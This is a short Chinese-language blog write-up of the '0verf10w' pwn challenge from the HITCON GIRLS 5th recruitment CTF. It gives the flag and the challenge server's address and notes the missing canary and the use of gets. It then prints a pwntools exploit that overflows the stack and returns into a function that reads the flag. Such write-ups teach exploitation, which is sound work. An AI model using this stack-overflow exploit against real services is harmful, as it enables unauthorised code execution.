2020年9月3日 星期四

【Write-up】HITCON GIRLS 5th 新生招募 CTF Write-up - Pwn



0verf10w

Flag

hg_5th{MDJ3ARLMT6}

write-up

題目

nc 139.162.79.241 10001
0verf10w me 0V0 :
abcd
abcd

使用工具分析

  1. 沒有canary保護

  2. 發現這隻程式使用gets函數抓使用者輸入

  3. 發現程式有個yummy的函數,執行system(“cat /home/hg/flag”)

Stack模擬

修改RET、控制EIP,取得程式流程

Exploit

from pwn import * host = "139.162.79.241" port = 10001 #r = process("./0verf10w") r = remote(host, port) payload='A'*(96+8) + p64(0x401153) r.sendline(payload) r.interactive()


orw

TBA


rop

TBA

沒有留言:

張貼留言